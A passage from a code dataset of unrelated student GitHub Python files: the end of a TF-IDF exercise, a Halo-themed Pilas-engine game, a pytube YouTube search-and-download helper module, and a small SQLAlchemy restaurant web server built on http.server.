friend_word_freq = get_frequencies(friend)
word_similarity = calculate_similarity_score(world_word_freq, friend_word_freq)
# print(word_similarity) # should print 0.33
## Tests Problem 6: Find TF-IDF
text_file = 'tests/student_tests/hello_world.txt'
text_files = ['tests/student_tests/hello_world.txt', 'tests/student_tests/hello_friends.txt']
tf = get_tf(text_file)
idf = get_idf(text_files)
tf_idf = get_tfidf(text_file, text_files)
# print(tf) ## should print {'hello': 0.5, 'world': 0.25, 'there': 0.25}
# print(idf) ## should print {'there': 0.3010299956639812, 'world': 0.3010299956639812, 'hello': 0.0, 'friends': 0.3010299956639812}
print(tf_idf) ## should print [('hello', 0.0), ('there', 0.0752574989159953), ('world', 0.0752574989159953)]
|
Shad0wSeven/6.100A
|
1_ps3/document_distance.py
|
document_distance.py
|
py
| 8,407 |
python
|
en
|
code
| 1 |
github-code
|
6
|
73860373627
|
# coding: utf-8
import pilasengine
import random
puntos = 0
pilas = pilasengine.iniciar()
sonido_menu = pilas.sonidos.cargar('Z_Spirit_Of_Fire.wav')
sonido_nivel_1 = pilas.sonidos.cargar('Z_Nightfall.wav')
sonido_nivel_2 = pilas.sonidos.cargar('Z_Just_Ad_Nauseam.wav')
sonido_del_final = pilas.sonidos.cargar('Z_Know_Your_Enemie.wav')
##############################
## ---------------Mis Personajes--------------- ##
##############################
class Chief(pilasengine.actores.Actor):
def iniciar(self):
self.imagen = 'Jefe.png'
self.x = -285
self.y = -210
self.escala = 0.05
self.radio_de_colision = 25
self.aprender("puedeexplotar")
self.aprender("disparar", municion = 'Municion')
def actualizar(self):
if pilas.control.izquierda:
self.x -= 5
if pilas.control.derecha:
self.x += 5
if pilas.control.abajo:
self.y -= 5
if pilas.control.arriba:
self.y += 5
if self.x >= 250:
self.x = 250
if self.x <= -285:
self.x = -285
if self.y >= 220:
self.y = 220
if self.y <= -210:
self.y = -210
class ChiefSuperior(pilasengine.actores.Actor):
def iniciar(self):
self.imagen = 'Jefe.png'
self.x = -285
self.y = -210
self.escala = 0.05
self.radio_de_colision = 25
self.aprender("puedeexplotar")
self.aprender("disparar", municion = 'Municion')
def actualizar(self):
if pilas.control.izquierda:
self.x -= 5
if pilas.control.derecha:
self.x += 5
if pilas.control.abajo:
self.y -= 5
if pilas.control.arriba:
self.y += 5
if self.x > 80:
self.x = -285
if self.x <= -285:
self.x = -285
if self.y >= 220:
self.y = 220
if self.y <= -210:
self.y = -210
class Plus(pilasengine.actores.Actor):
def iniciar(self):
self.imagen = pilas.imagenes.cargar('Mejora.png')
self.radio_de_colision = 20
self.escala = 0.20
self.x = 100
self.y = random.randint(-100,100)
self.pilas.utils.interpolar(self, 'x', -365, duracion=5, tipo='gradual')
if self.x == -300:
self.eliminar()
class ChiefPlus(pilasengine.actores.Actor):
def iniciar(self):
self.imagen = 'JefeSPNRk.png'
self.x = self.x
self.y = self.y
self.escala = 0.05
self.radio_de_colision = 25
self.aprender("puedeexplotar")
self.aprender("disparar", municion = 'Cohete')
class DestructorPlus(pilasengine.actores.ActorInvisible):
def iniciar(self):
self.x = 300
self.barraPP = pilas.actores.Energia(50,225,progreso=100, ancho=500, alto=10, color_relleno = pilasengine.colores.verde)
def actualizar(self):
self.barraPP.progreso=self.barraPP.progreso - 1
if self.barraPP.progreso==0:
self.x = 0
self.barraPP.eliminar()
self.figura_de_colision = pilas.fisica.Rectangulo(0, 0, 666, 666, sensor=True, dinamica=False)
class Municion(pilasengine.actores.Actor):
def iniciar(self):
self.imagen = 'Sniper.png'
self.figura_de_colision = pilas.fisica.Rectangulo(-285, -210, 17, 45, sensor=True, dinamica=False)
def actualizar(self):
self.figura_de_colision.x = self.x
self.figura_de_colision.y = self.y
if self.x > 300:
self.eliminar()
self.figura_de_colision.eliminar()
class Cohete(pilasengine.actores.Actor):
def iniciar(self):
self.imagen = 'SPNRk.png'
self.aprender("puedeexplotar")
self.figura_de_colision = pilas.fisica.Rectangulo(-285, -210, 17, 45, sensor=True, dinamica=False)
def actualizar(self):
self.figura_de_colision.x = self.x
self.figura_de_colision.y = self.y
if self.x > 300:
self.eliminar()
self.figura_de_colision.eliminar()
class Elite(pilasengine.actores.Actor):
def iniciar(self):
self.imagen = 'Enemigo_Elite.png'
self.escala = 0.07
self.y = 270
self.x = random.randint(-300, 300)
self.radio_de_colision = 25
def actualizar(self):
self.y -= 5
if self.y <= -230:
self.eliminar()
class AtrioxBoss(pilasengine.actores.Actor):
def iniciar(self):
self.imagen = 'Atriox.png'
self.escala = 0.40
self.x = 215
self.y = -50
self.figura_de_colision = pilas.fisica.Rectangulo(self.x, self.y, 215, 450, sensor=True, dinamica=False)
class BansheeBoss(pilasengine.actores.Actor):
def iniciar(self):
self.imagen = pilas.imagenes.cargar('Banshee.png')
self.radio_de_colision = 35
self.escala = 0.1
self.x = 195
self.y = random.randint(-200, 255)
self.aprender( pilas.habilidades.PuedeExplotarConHumo )
self.pilas.utils.interpolar(self, 'x', -375, duracion=1, tipo='lineal')
self.pilas.utils.interpolar(self, 'y', random.randint(-300, 300), duracion=1, tipo='lineal')
def actualizar(self):
if self.x <= -365:
self.eliminar()
class Grunt(pilasengine.actores.Actor):
def iniciar(self):
self.imagen = 'Puntos_Grunt.png'
self.escala = 0.05
self.radio_de_colision = 17
self.aprender( pilas.habilidades.PuedeExplotarConHumo )
self.izquierda = 300
self.y = random.randint(-210,50)
def actualizar(self):
self.x-=5
if self.x < -300:
self.eliminar()
##########################
## ---------------Botones--------------- ##
##########################
class Boton_Menu(pilasengine.actores.Actor):
def iniciar(self):
self.imagen = 'Casco_Mark.png'
self.x = -280
self.y = 180
reiniciar_texto = pilas.interfaz.Boton("Volver al Menu")
reiniciar_texto.conectar(self.escena_menu)
reiniciar_texto.x = -265
reiniciar_texto.y = 220
self.cuando_hace_click = self.escena_menu
def escena_menu(self):
sonido_del_final.detener()
self.pilas.escenas.MenuInicio()
class Boton_Nivel_1(pilasengine.actores.Actor):
def iniciar(self):
self.imagen = 'Casco_Chief.jpg'
self.x = 0
self.y = -30
self.escala = 0.25
reiniciar_texto = pilas.interfaz.IngresoDeTexto(" Click en el icono para iniciar o reiniciar.")
reiniciar_texto.x = 0
reiniciar_texto.y = -115
self.cuando_hace_click = self.escena_inicial
def escena_inicial(self):
sonido_menu.detener()
sonido_del_final.detener()
self.pilas.escenas.Nivel_1()
class Boton_Nivel_2(pilasengine.actores.Actor):
def iniciar(self):
self.imagen = 'Casco_Chief.jpg'
self.x = 0
self.y = -30
self.escala = 0.25
reiniciar_texto = pilas.interfaz.IngresoDeTexto(" Click en el icono para iniciar o reiniciar.")
reiniciar_texto.x = 0
reiniciar_texto.y = -115
self.cuando_hace_click = self.escena_inicial
def escena_inicial(self):
sonido_del_final.detener()
self.pilas.escenas.Nivel_2()
class Boton_Info(pilasengine.actores.Actor):
def iniciar(self):
self.imagen = 'Casco_Mark.png'
self.x = -280
self.y = 180
reiniciar_texto = pilas.interfaz.Boton("Informacion")
reiniciar_texto.conectar(self.escena_info)
reiniciar_texto.x = -270
reiniciar_texto.y = 220
self.cuando_hace_click = self.escena_info
def escena_info(self):
sonido_menu.reproducir(repetir = True)
self.pilas.escenas.Info()
###########################
## ---------------Escenarios--------------- ##
###########################
class MenuInicio(pilasengine.escenas.Escena):
def iniciar(self):
fondo_inicio = pilas.fondos.Fondo()
fondo_inicio.imagen = pilas.imagenes.cargar('Menu.jpg')
fondo_inicio.x = 75
fondo_inicio.escala = 0.65
self.boton()
def boton(self):
pilas.actores.Boton_Nivel_1()
pilas.actores.Boton_Info()
class Info(pilasengine.escenas.Escena):
def iniciar(self):
fondo_info = pilas.fondos.Fondo()
fondo_info.imagen = pilas.imagenes.cargar('Eclipse.png')
fondo_info.x = 40
fondo_info.escala = 0.85
textoT = pilas.interfaz.IngresoDeTexto(" TIBERPLANOIBE")
textoT.y = 225
texto = pilas.actores.Texto("Todo el contenido grafico y auditivo de\neste juego ha sido obtenido de la popular\nsaga \"Halo\". Nada de este material es de\nmi autoria.\nPor otro lado, todo el codigo ha sido\nescrito por mi, usando esta herramienta\ndenominada \"Pilas-engine\".\nAtte. Danilo A. Ochoa Hidalgo.")
texto.x = 70
texto.y = -100
self.boton()
def boton(self):
pilas.actores.Boton_Menu()
class Nivel_1(pilasengine.escenas.Escena):
def iniciar(self):
global puntos
sonido_nivel_1.reproducir(repetir = True)
homunculus = pilas.fondos.Fondo()
homunculus.imagen = pilas.imagenes.cargar('Fondo.jpg')
homunculus.escala = 0.45
texto = pilas.actores.Texto("Debes conseguir 100:")
texto.x = 0
texto.y = 225
self.puntaje = self.pilas.actores.Puntaje(150, 225, color=pilas.colores.blanco)
self.puntaje.definir(puntos)
self.pilas.actores.Chief()
self.pilas.tareas.siempre(0.5,self.crear_baneador)
self.pilas.tareas.siempre(1,self.crear_chupa_pitos)
self.pilas.colisiones.agregar('Chief','Elite', self.cuando_elite_toca)
self.pilas.colisiones.agregar('Municion','Grunt', self.cuando_municion_toca)
def crear_baneador(self):
self.pilas.actores.Elite()
def crear_chupa_pitos(self):
self.pilas.actores.Grunt()
def cuando_elite_toca(self, chief, elite):
chief.eliminar()
self.puntaje = 0
if self.puntaje == 0:
self.pilas.escena_actual().tareas.eliminar_todas()
sonido_nivel_1.detener()
self.pilas.escenas.Perdedor()
def cuando_municion_toca(self, municion, grunt):
global puntos
grunt.eliminar()
puntos += 5
self.puntaje.aumentar(5)
if puntos == 100:
self.pilas.escena_actual().tareas.eliminar_todas()
sonido_nivel_1.detener()
self.pilas.escenas.Nivel_2()
class Nivel_2(pilasengine.escenas.Escena):
def iniciar(self):
sonido_nivel_2.reproducir(repetir = True)
homunculus = pilas.fondos.Fondo()
homunculus.imagen = pilas.imagenes.cargar('Fondox2.jpg')
homunculus.escala = 0.45
self.barraP = pilas.actores.Energia(-260,225,progreso=100, ancho=100, alto=20, color_relleno = pilasengine.colores.verde)
self.barraZ = pilas.actores.Energia(0,-225,progreso=100, ancho=500, alto=20, color_relleno = pilasengine.colores.verde)
self.pilas.actores.ChiefSuperior()
self.pilas.actores.AtrioxBoss()
self.pilas.actores.Plus()
self.pilas.tareas.siempre(0.5,self.ban)
self.pilas.tareas.siempre(15,self.crear_mejora)
self.pilas.colisiones.agregar('ChiefSuperior','Plus', self.cuando_toca_plus)
self.pilas.colisiones.agregar('Cohete','AtrioxBoss', self.cuando_cohete_toca_atriox)
self.pilas.colisiones.agregar('Municion','AtrioxBoss', self.cuando_municion_toca_atriox)
self.pilas.colisiones.agregar('ChiefSuperior','BansheeBoss', self.cuando_toca_ban)
self.pilas.colisiones.agregar('ChiefPlus','DestructorPlus', self.cuando_plus_termina)
def destruye_plus(self):
self.pilas.actores.DestructorPlus()
def crear_mejora(self):
self.pilas.actores.Plus()
def ban(self):
self.pilas.actores.BansheeBoss()
def cuando_toca_plus(self, puck, plus):
plus.eliminar()
puck.eliminar()
self.pilas.actores.ChiefPlus()
self.pilas.actores.DestructorPlus()
def cuando_plus_termina(self, pplus, destructor):
pplus.eliminar()
destructor.eliminar()
self.pilas.actores.ChiefSuperior()
self.barraP.progreso=self.barraP.progreso + 20
def cuando_cohete_toca_atriox(self, cohete, atrioxboss):
cohete.eliminar()
self.barraZ.progreso=self.barraZ.progreso - 2
def cuando_municion_toca_atriox(self, municion, atrioxboss):
municion.eliminar()
self.barraZ.progreso=self.barraZ.progreso - 0.1
if self.barraZ.progreso<=200:
self.barraZ.color_relleno=pilasengine.colores.amarillo
if self.barraZ.progreso<=100:
self.barraZ.color_relleno=pilasengine.colores.naranja
if self.barraZ.progreso<=50:
self.barraZ.color_relleno=pilasengine.colores.rojo
if self.barraZ.progreso<=0:
self.pilas.escena_actual().tareas.eliminar_todas()
sonido_nivel_2.detener()
self.pilas.escenas.Ganador()
def cuando_toca_ban(self, chief, ban):
ban.eliminar()
self.barraP.progreso=self.barraP.progreso - 20
if self.barraP.progreso<=70:
self.barraP.color_relleno=pilasengine.colores.amarillo
if self.barraP.progreso<=50:
self.barraP.color_relleno=pilasengine.colores.naranja
if self.barraP.progreso<=30:
self.barraP.color_relleno=pilasengine.colores.rojo
if self.barraP.progreso<=0:
self.pilas.escena_actual().tareas.eliminar_todas()
sonido_nivel_2.detener()
self.pilas.escenas.Perdedor_x2()
class Ganador(pilasengine.escenas.Escena):
def iniciar(self):
sonido_del_final.reproducir(repetir = True)
fondo_ganador = pilas.fondos.Fondo()
fondo_ganador.imagen = pilas.imagenes.cargar('Ganar.jpg')
fondo_ganador.escala = 0.5
fondo_ganador.x = -150
texto = pilas.interfaz.Boton("Luego de la caida de \"Atriox\" el Jefe Maestro")
texto1 = pilas.interfaz.Boton("se encontro perdido en el espacio.")
texto2 = pilas.interfaz.Boton("Como nadie logro dar con su paradero")
texto3 = pilas.interfaz.Boton("la UNSC lo declaro como desaparecido en combate.")
texto.y = 100
texto1.y = 40
texto2.y = -20
texto3.y = -80
pilas.actores.Boton_Menu()
class Perdedor(pilasengine.escenas.Escena):
def iniciar(self):
global puntos
puntos = 0
sonido_del_final.reproducir()
fondo_perdedor = pilas.fondos.Fondo()
fondo_perdedor.imagen = pilas.imagenes.cargar('Perder.jpg')
fondo_perdedor.escala = 1.5
texto = pilas.interfaz.Boton("Luego de la caida del Jefe Maestro,")
texto1 = pilas.interfaz.Boton("y sin nadie que pudiera proteger,")
texto2 = pilas.interfaz.Boton("la Tierra fue arrasada hasta convertirse en polvo.")
texto3 = pilas.interfaz.Boton("Paz en la tumba de Jhon-117")
texto.x = 0
texto.y = 180
texto1.x = 0
texto1.y = 140
texto2.x = 0
texto2.y =100
texto3.x = 0
texto3.y = -180
self.pilas.actores.Boton_Nivel_1()
self.pilas.actores.Boton_Menu()
class Perdedor_x2(pilasengine.escenas.Escena):
def iniciar(self):
global puntos
puntos = 0
sonido_del_final.reproducir()
fondo_perdedor = pilas.fondos.Fondo()
fondo_perdedor.imagen = pilas.imagenes.cargar('Perderx2.jpg')
fondo_perdedor.escala = 1.3
fondo_perdedor.x = 180
fondo_perdedor.y = -80
texto = pilas.interfaz.Boton("Con Atriox al mando de los \"Desterrados\",")
texto1 = pilas.interfaz.Boton("y sin nadie en pie para proteger nuestro hogar,")
texto2 = pilas.interfaz.Boton("nuestro planeta se vio consumido por la ambicion del Brute.")
texto3 = pilas.interfaz.Boton("Ahora nuestro legado ha llegado a su fin.")
texto.x = 0
texto.y = 180
texto1.x = 0
texto1.y = 140
texto2.x = 0
texto2.y =100
texto3.x = 0
texto3.y = -180
self.pilas.actores.Boton_Nivel_2()
self.pilas.actores.Boton_Menu()
#############################
## ---------------Vinculaciones--------------- ##
#############################
pilas.escenas.vincular(MenuInicio)
pilas.escenas.vincular(Info)
pilas.escenas.vincular(Nivel_1)
pilas.escenas.vincular(Nivel_2)
pilas.escenas.vincular(Ganador)
pilas.escenas.vincular(Perdedor)
pilas.escenas.vincular(Perdedor_x2)
pilas.actores.vincular(Chief)
pilas.actores.vincular(ChiefSuperior)
pilas.actores.vincular(Plus)
pilas.actores.vincular(ChiefPlus)
pilas.actores.vincular(DestructorPlus)
pilas.actores.vincular(Municion)
pilas.actores.vincular(Cohete)
pilas.actores.vincular(Elite)
pilas.actores.vincular(AtrioxBoss)
pilas.actores.vincular(BansheeBoss)
pilas.actores.vincular(Grunt)
pilas.actores.vincular(Boton_Menu)
pilas.actores.vincular(Boton_Nivel_1)
pilas.actores.vincular(Boton_Nivel_2)
pilas.actores.vincular(Boton_Info)
pilas.escenas.MenuInicio()
pilas.ejecutar()
|
da8ah/UTPL-PilasEngineGame
|
Halo/1.Ejecutable.py
|
1.Ejecutable.py
|
py
| 17,937 |
python
|
es
|
code
| 0 |
github-code
|
6
|
9074380203
|
import requests
import pandas as pd
from pytube import YouTube, Search
import os
from pathlib import Path
from .serializers import *
# Youtube credentials
YOUTUBE_KEY_API = 'YOUR_YOUTUBE_KEY_API'
# Setting url for videos and searching list
SEARCH_URL = 'https://www.googleapis.com/youtube/v3/search'
VIDEOS_URL = 'https://www.googleapis.com/youtube/v3/videos'
# Find users downloads path
DOWNLOAD_PATH = str(Path.home() / 'Downloads')
ABSOLUTE_PATH = None #str(Path.absolute())
# SEARCH PARAMETERS
search_params = {
'key': YOUTUBE_KEY_API,
'q': '', # request.form.get('query')
'part': 'snippet',
'maxResults': 9,
'type': 'video'
}
# VIDEO PARAMETERS
video_params = {
'key': YOUTUBE_KEY_API,
'id': '', #','.join(video_ids),
'part': 'snippet,contentDetails',
'maxResults': 9
}
# Videos for testing
tiesto = [
{'video_id': 'nCg3ufihKyU', 'title': 'Tiësto - The Business (Official Music Video)', 'url': 'https://youtube.com/watch?v=nCg3ufihKyU', 'thumbnail': 'https://i.ytimg.com/vi/nCg3ufihKyU/sddefault.jpg?v=5f6cc459'},
{'video_id': 'taSubkjZUA4', 'title': "Tiësto & Karol G - Don't Be Shy (Official Music Video)", 'url': 'https://youtube.com/watch?v=taSubkjZUA4', 'thumbnail': 'https://i.ytimg.com/vi/taSubkjZUA4/sddefault.jpg?v=61151971'},
{'video_id': '1_4ELAxKrDc', 'title': 'Tiësto & Ava Max - The Motto (Official Music Video)', 'url': 'https://youtube.com/watch?v=1_4ELAxKrDc', 'thumbnail': 'https://i.ytimg.com/vi/1_4ELAxKrDc/sddefault.jpg?v=6183096b'},
{'video_id': '8R_4O3q92Lo', 'title': 'Tiësto - Live from Edge New York City', 'url': 'https://youtube.com/watch?v=8R_4O3q92Lo', 'thumbnail': 'https://i.ytimg.com/vi/8R_4O3q92Lo/sddefault.jpg'},
{'video_id': 'O1M2Dh94gMU', 'title': 'CLUBLIFE by Tiësto Episode 804', 'url': 'https://youtube.com/watch?v=O1M2Dh94gMU', 'thumbnail': 'https://i.ytimg.com/vi/O1M2Dh94gMU/hqdefault.jpg'},
{'video_id': 'r0bhF7SJLYQ', 'title': 'Tiësto & Charli XCX - Hot In It [Official Music Video]', 'url': 'https://youtube.com/watch?v=r0bhF7SJLYQ', 'thumbnail': 'https://i.ytimg.com/vi/r0bhF7SJLYQ/sddefault.jpg?v=62f5cd4d'},
{'video_id': 'nK-7S9HzFjo', 'title': 'TIËSTO MEGAMIX 2022 - Best Songs Of All Time', 'url': 'https://youtube.com/watch?v=nK-7S9HzFjo', 'thumbnail': 'https://i.ytimg.com/vi/nK-7S9HzFjo/sddefault.jpg'},
{'video_id': 'JqUqyUEwTMY', 'title': 'Tiësto - In Search Of Sunrise 4: Latin America CD1', 'url': 'https://youtube.com/watch?v=JqUqyUEwTMY', 'thumbnail': 'https://i.ytimg.com/vi/JqUqyUEwTMY/sddefault.jpg'},
{'video_id': 'kjdOBYTUOzY', 'title': 'TIËSTO @ 15 Years of Tomorrowland 2019 [full set]', 'url': 'https://youtube.com/watch?v=kjdOBYTUOzY', 'thumbnail': 'https://i.ytimg.com/vi/kjdOBYTUOzY/sddefault.jpg?v=5e2216ce'},
{'video_id': 'ontU9cOg354', 'title': 'Tiësto, Jonas Blue & Rita Ora - Ritual (Official Video)', 'url': 'https://youtube.com/watch?v=ontU9cOg354', 'thumbnail': 'https://i.ytimg.com/vi/ontU9cOg354/sddefault.jpg?v=5d0183d9'},
{'video_id': 'e94gack-DJk', 'title': 'Tiësto - Live @ Ultra Music Festival 2022', 'url': 'https://youtube.com/watch?v=e94gack-DJk', 'thumbnail': 'https://i.ytimg.com/vi/e94gack-DJk/sddefault.jpg'},
{'video_id': 'LqCcdtM7Qe4', 'title': 'Tiesto - Silence - Delerium featuring Sarah McLachlan', 'url': 'https://youtube.com/watch?v=LqCcdtM7Qe4', 'thumbnail': 'https://i.ytimg.com/vi/LqCcdtM7Qe4/hqdefault.jpg'},
{'video_id': 'b3mOLJvbBwQ', 'title': 'Tiësto feat. Nelly Furtado - Who Wants To Be Alone', 'url': 'https://youtube.com/watch?v=b3mOLJvbBwQ', 'thumbnail': 'https://i.ytimg.com/vi/b3mOLJvbBwQ/hqdefault.jpg'},
{'video_id': 'VlWOFJJIo9Y', 'title': 'DJ Tiesto - Insomnia', 'url': 'https://youtube.com/watch?v=VlWOFJJIo9Y', 'thumbnail': 'https://i.ytimg.com/vi/VlWOFJJIo9Y/hqdefault.jpg'},
{'video_id': 'Dr1nN__-2Po', 'title': 'Tiësto & KSHMR feat. Vassy - Secrets (Official Music Video)', 'url': 'https://youtube.com/watch?v=Dr1nN__-2Po', 'thumbnail': 'https://i.ytimg.com/vi/Dr1nN__-2Po/sddefault.jpg'},
{'video_id': '2EaE0_gQLw0', 'title': 'Tiësto - Adagio For Strings', 'url': 'https://youtube.com/watch?v=2EaE0_gQLw0', 'thumbnail': 'https://i.ytimg.com/vi/2EaE0_gQLw0/hqdefault.jpg'},
{'video_id': '8tIgN7eICn4', 'title': 'DJ Tiesto - Adagio For Strings', 'url': 'https://youtube.com/watch?v=8tIgN7eICn4', 'thumbnail': 'https://i.ytimg.com/vi/8tIgN7eICn4/hqdefault.jpg'},
{'video_id': '-qgzNwdkV4s', 'title': 'Dj Tiesto - Traffic!', 'url': 'https://youtube.com/watch?v=-qgzNwdkV4s', 'thumbnail': 'https://i.ytimg.com/vi/-qgzNwdkV4s/hqdefault.jpg'},
{'video_id': 'Jbh3GlrRcQ4', 'title': 'Tiësto ft. BT - Love Comes Again (Official Video)', 'url': 'https://youtube.com/watch?v=Jbh3GlrRcQ4', 'thumbnail': 'https://i.ytimg.com/vi/Jbh3GlrRcQ4/sddefault.jpg'}
]
# Main functions
def fetch_videos_from_yt(query, uat_data=None):
if uat_data:
return uat_data
videos = []
video_ids = []
search_params['q'] = query
video_params['q'] = query
try:
requests.get(SEARCH_URL, params=search_params)
search_response = requests.json()['items']
for item in search_response:
video_ids.append(item['id']['videoId'])
except:
print(f'Connection Error')
if video_ids:
requests.get(VIDEOS_URL, params=video_params)
video_response = requests.json()['items']
for video in video_response:
video_data = {
'video_id': video['id'],
'url': f'https://www.youtube.com/watch?v={video["id"]}',
'thumbnail': video['snippet']['thumbnails']['high']['url'],
'title': video['snippet']['title']
}
videos.append(video_data)
return videos
def fetch_videos(query, uat_data=None):
if uat_data:
return uat_data
else:
videos = []
search = Search(query)
for result in search.results:
video = {}
video['video_id'] = result.video_id
video['title'] = result.title
video['url'] = result.watch_url
video['thumbnail'] = YouTube(result.watch_url).thumbnail_url
videos.append(video)
return videos
def create_folders(video:bool=True):
path_to_file = DOWNLOAD_PATH + '/DJStudio'
file_exists = os.path.exists(path_to_file)
if not file_exists:
os.mkdir(path_to_file)
print(f'Created path: {path_to_file}', end='\n')
if video:
path_to_file = DOWNLOAD_PATH + '/DJStudio/VIDEO'
file_exists = os.path.exists(path_to_file)
if not file_exists:
os.mkdir(path_to_file)
print(f'Created path: {path_to_file}', end='\n')
else:
path_to_file = DOWNLOAD_PATH + '/DJStudio/MP3'
file_exists = os.path.exists(path_to_file)
if not file_exists:
os.mkdir(path_to_file)
print(f'Created path: {path_to_file}', end='\n')
return path_to_file
def download_video(video_id):
status = 'pending'
path_to_file = create_folders(video=True)
link=f"https://www.youtube.com/watch?v={video_id}"
try:
yt = YouTube(link)
except:
print("Connection Error")
try:
yt.streams.filter(progressive=True, file_extension="mp4").first().download(output_path=path_to_file)
status = 'approved'
except:
print("Some Error!")
status = 'rejected'
return status
def download_mp3(video_id):
status = 'pending'
video = f'https://www.youtube.com/watch?v={video_id}'
path_to_file = create_folders(video=False)
try:
audio_title = YouTube(video).title
audio_mp4 = YouTube(video).streams.filter(only_audio=True).first().download(output_path=path_to_file)
log = f' Downloaded: {audio_title}'
status = 'approved'
except:
log = f'Error: {audio_title}'
status = 'rejected'
try :
base, ext = os.path.splitext(audio_mp4)
to_mp3 = base + '.mp3'
os.rename(audio_mp4, to_mp3)
except FileExistsError:
os.remove(to_mp3)
os.rename(audio_mp4, to_mp3)
log = log.replace('Downloaded', 'Already exists')
return status
def download_mp3_from_file(file):
df_videos = pd.read_excel(file)
column = df_videos.columns[0]
videos = df_videos[column].str.strip().tolist()
path_to_file = create_folders(video=False)
logs = []
for idx, video in enumerate(iterable=videos, start=1):
try:
audio_title = YouTube(video).title
audio_mp4 = YouTube(video).streams.filter(only_audio=True).first().download(output_path=path_to_file)
log = [idx, 'Downloaded', audio_title]
except:
log = [idx, 'Error', audio_title]
try :
base, ext = os.path.splitext(audio_mp4)
to_mp3 = base + '.mp3'
os.rename(audio_mp4, to_mp3)
except FileExistsError:
os.remove(to_mp3)
os.rename(audio_mp4, to_mp3)
log[1] = 'Already exists'
print(log[0], log[1], log[2])
logs.append(log)
return logs
def fetch_playlist(user_email):
user_playlist = Playlist.objects.all().filter(user_email=user_email)
playlist_serializer = PlaylistSerializer(user_playlist, many=True)
print('fetch_playlist: ', playlist_serializer.data)
return playlist_serializer.data
def add_to_playlist(video):
status = 'pending'
playlist_serializer = PlaylistSerializer(data=video)
if playlist_serializer.is_valid():
playlist_serializer.save()
status = 'approved'
else:
status = 'rejected'
return status
def delete_from_playlist(video_id, user_email):
status='pending'
try:
record = Playlist.objects.all().filter(video_id=video_id, user_email=user_email)
record.delete()
status = 'approved'
except Exception as e:
print(e)
status = 'rejected'
return status
def save_contact_message(contact_email, user_message, contact_date):
status = 'pending'
contact_serializer = ContactSerializer(contact_email=contact_email, user_message=user_message, contact_date=contact_date)
if contact_serializer.is_valid():
contact_serializer.save()
status = 'approved'
else:
status = 'rejected'
return status
|
nikavgeros/DJ-Studio
|
backend/dj_studio/utils.py
|
utils.py
|
py
| 9,608 |
python
|
en
|
code
| 0 |
github-code
|
6
|
21217863407
|
import cgi
from http.server import BaseHTTPRequestHandler,HTTPServer
from db_setup import Base,Restaurant,MenuItem
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
engine = create_engine('sqlite:///restaurantmenu.db')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
class webserverHandler(BaseHTTPRequestHandler):
def do_GET(self):
try:
if self.path.endswith("/restaurant"):
self.send_response(200)
self.send_header('content-type','text/html')
self.end_headers()
output=""
output +='<html><body><h1><a href="/restaurant/new">Create a new Restaurant</a></h2>'
output +='<h2>Restaurants List</h2>'
listOfRes = session.query(Restaurant).all()
for restaurant in listOfRes:
output+='<h3>%s</h3>' %(restaurant.name)
output+= '<br>'
editLink = "/restaurant/%s/edit" %(restaurant.id)
output+= '<a href="%s">Edit</a>' %(editLink)
output+='<br>'
deleteLink = "/restaurant/%s/delete" % restaurant.id
output+='<a href="%s">Delete</a>' % deleteLink
output += "</body></html>"
self.wfile.write(bytes(output,"UTF-8"))
return
if self.path.endswith("/delete"):
restaurantId=self.path.split("/")[2]
getResById = session.query(Restaurant).filter_by(id=restaurantId).one()
if(getResById != []):
self.send_response(200)
self.send_header('content-type', 'text/html')
self.end_headers()
output = ""
output += "<html><body>"
output += "<h2>Do you want to delete this Restaurant?</h2>"
output += "<form method='POST' enctype='multipart/form-data' action='/restaurant/%s/delete'>" \
"<input type='submit' value='Delete'></form>" % restaurantId
output += "</body></html>"
self.wfile.write(bytes(output,"utf-8"))
return
if self.path.endswith("/edit"):
restaurantId=self.path.split("/")[2]
getNameById = session.query(Restaurant).filter_by(id=restaurantId).one()
if(getNameById != []):
self.send_response(200)
self.send_header('content-type', 'text/html')
self.end_headers()
output=""
output+="<html><body>"
output+="<h2>%s</h2>" %(getNameById.name)
output+= "<form method='POST' enctype='multipart/form-data' action='/restaurant/%s/edit'>" \
"<input name='editedName' placeholder='Enter New Name' type='text'>" \
"<input type='submit' value='Rename'></form>" %(restaurantId)
output+="</body></html>"
self.wfile.write(bytes(output,"utf-8"))
return
if self.path.endswith("/restaurant/new"):
self.send_response(200)
self.send_header('content-type','text/html')
self.end_headers()
output=""
output += '<html><body>'
output += "<form method='POST' enctype='multipart/form-data' action='/restaurant/new'><h1>Make a New Restaurant</h1>" \
"<input name='nameOfRes' type='text'><input type='submit' value='Create'></form>"
output += "</body></html>"
self.wfile.write(bytes(output,"UTF-8"))
return
if self.path.endswith("/hello"):
self.send_response(200)
self.send_header('content-type','text/html')
self.end_headers()
output=""
output=output+'<html><body><h1>Hello!</h1></body></html>'
output += "<form method='POST' enctype='multipart/form-data' action='/hello'><h2>what would like me to say?</h2>" \
"<input name='message' type='text'><input type='submit' value='Submit'></form>"
output += "</body></html>"
self.wfile.write(bytes(output,"UTF-8"))
print(output)
return
except IOError:
self.send_error(404,"FILE NOT FOUND %s" % self.path)
def do_POST(self):
try:
if self.path.endswith("/delete"):
restaurantId = self.path.split("/")[2]
deleteRes = session.query(Restaurant).filter_by(id=restaurantId).one()
if(deleteRes != []):
session.delete(deleteRes)
session.commit()
self.send_response(301)
self.send_header('Content-type', 'text/html')
self.send_header('Location', '/restaurant')
self.end_headers()
return
if self.path.endswith("/edit") :
restaurantId = self.path.split("/")[2]
ctype,pdict = cgi.parse_header(self.headers.get('content-type'))
pdict['boundary'] = bytes(pdict['boundary'],"utf-8")
fields=""
if(ctype=='multipart/form-data'):
fields = cgi.parse_multipart(self.rfile,pdict)
newName = fields.get('editedName')
newName = newName[0].decode("utf-8")
rename = session.query(Restaurant).filter_by(id=restaurantId).one()
if rename != []:
rename.name = newName
session.add(rename)
session.commit()
self.send_response(301)
self.send_header('Content-type', 'text/html')
self.send_header('Location', '/restaurant')
self.end_headers()
if(self.path.endswith("/restaurant/new")):
ctype, pdict = cgi.parse_header(self.headers.get('content-type'))
pdict['boundary'] = bytes(pdict['boundary'], "UTF-8")
if (ctype == 'multipart/form-data'):
fields = cgi.parse_multipart(self.rfile, pdict)
nameOfRes = fields.get('nameOfRes')
ResToDb = Restaurant(name=nameOfRes[0].decode("utf-8"))
session.add(ResToDb)
session.commit()
self.send_response(301)
self.send_header('Content-type', 'text/html')
self.send_header('Location','/restaurant')
self.end_headers()
print("Output OK")
return
# output += "<h2>Okay,how about this:</h2>"
